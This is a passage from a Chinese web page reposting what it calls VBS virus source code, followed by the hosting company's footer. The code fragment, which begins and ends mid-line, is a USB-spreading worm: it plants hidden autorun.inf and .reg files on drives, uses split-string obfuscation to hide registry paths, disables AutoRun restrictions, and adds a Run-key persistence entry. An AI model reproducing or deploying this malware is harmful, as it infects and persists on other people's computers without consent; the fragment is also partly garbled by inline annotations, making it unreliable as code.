快速业务通道

vbs病毒源文件

作者 佚名 来源 ASP编程 浏览 发布时间 2013-07-09
hr(34)&chr(64)&"C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34)&"="&chr(34)&"MicrosoftWord文档"&chr(34)
ts.close
Setf=fs.GetFile(fs.GetSpecialFolder(1)&"\doc.reg")
f.attributes=f.attributes+7
else
Setts=fs.CreateTextFile(w.DriveLetter&":\vbs.reg",true)
ts.WriteLine"WindowsRegistryEditorVersion5.00"
ts.WriteLine"[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]"
ts.WriteLinechr(34)&chr(64)&"C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34)&"="&chr(34)&"文本文件"&chr(34)
ts.close
Setf=fs.GetFile(w.DriveLetter&":\vbs.reg")
f.attributes=f.attributes+7
Setts=fs.CreateTextFile(w.DriveLetter&":\doc.reg",true)
ts.WriteLine"WindowsRegistryEditorVersion5.00"
ts.WriteLine"[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]"
ts.WriteLinechr(34)&chr(64)&"C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34)&"="&chr(34)&"MicrosoftWord文档"&chr(34)
ts.close
Setf=fs.GetFile(w.DriveLetter&":\doc.reg")
f.attributes=f.attributes+7
endif
endif
endif
Iffs.FileExists(w.DriveLetter&":\autorun.inf")Then
Setc=fs.opentextfile(w.DriveLetter&":\autorun.inf",1)
vbc=c.readall
IfInStr(vbc,"WScript.exe.\autorun.vbs")<>0Then
c.Close
Else
Setf=fs.GetFile(w.DriveLetter&":\autorun.inf")
f.attributes=f.attributes-f.attributes
Setts=f.OpenAsTextStream(2,-2)
ts.WriteLine"[AutoRun]"
ts.WriteLine"open="
ts.WriteLine""
ts.WriteLine"shell\open=打开(&O)"
ts.WriteLine"shell\open\Command=WScript.exe.\autorun.vbs"
ts.WriteLine"shell\open\Default=1"
ts.close
f.attributes=f.attributes+7
endif
else
Setts=fs.CreateTextFile(w.DriveLetter&":\autorun.inf",true)
ts.WriteLine"[AutoRun]"
ts.WriteLine"open="
ts.WriteLine""
ts.WriteLine"shell\open=打开(&O)"
ts.WriteLine"shell\open\Command=WScript.exe.\autorun.vbs"
ts.WriteLine"shell\open\Default=1"
ts.close
Setf=fs.GetFile(w.DriveLetter&":\autorun.inf")
f.attributes=f.attributes+7
EndIf
endif
endFunction
Functionregwrite()
OnErrorResumeNext
dims
a1="HKE"&"Y_CUR"&"RENT_US"&"ER\Soft"&"ware\Mi"&"croso"&"ft\Win"&"dows\Cur"&"rentV"&"ersion\Exp"&"lorer\Ad"&"vanced\"(a1=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\
a2="HK"&"EY_CLAS"&"SES_RO"&"OT\DLL"&"File\"(a2=HKEY_CLASSES_ROOT\DLLFile)
a3="HKEY"&"_LOCA"&"L_MACH"&"INE\SOFT"&"WARE\Mi"&"cros"&"oft\Win"&"dows\Cur"&"rentVer"&"sion\poli"&"cies\Expl"&"orer\NoDr"&"iveTypeAutoRun"
(a3=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDriveTypeAutoRun)
a4="HKE"&"Y_CURR"&"ENT_USE"&"R\Softw"&"are\Micr"&"osoft\Wi"&"ndows\Cur"&"rentVersi"&"on\Polici"&"es\Explor"&"er\NoDriveT"&"ypeAutoRun"
(a4=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun)
a5="HK"&"EY_LO"&"CAL_MA"&"CHINE\Sof"&"tware\Mi"&"croso"&"ft\Wind"&"ows\Curre"&"ntVersi"&"on\Ru"&"n\USBDR"&"IVE.dll"
(a5=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\USBDRIVE.dll)
a6="R.Re"&"gWri"&chr(116)&"e"(a6=R.RegWrichr(116)e)
a7="HKE"&"Y_CLAS"&"SES_ROO"&"T\VBSF"&"ile\Defau"&"ltIcon\"
(a7=HKEY_CLASSES_ROOT\VBSF

凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!

分享到: 更多

Copyright ©1999-2011 厦门凌众科技有限公司 厦门优通互联科技开发有限公司 All rights reserved

地址(ADD):厦门软件园二期望海路63号701E(东南融通旁) 邮编(ZIP):361008

电话:0592-5908028 传真:0592-5908039 咨询信箱:web@lingzhong.cn 咨询OICQ:173723134

《中华人民共和国增值电信业务经营许可证》闽B2-20100024  ICP备案:闽ICP备05037997号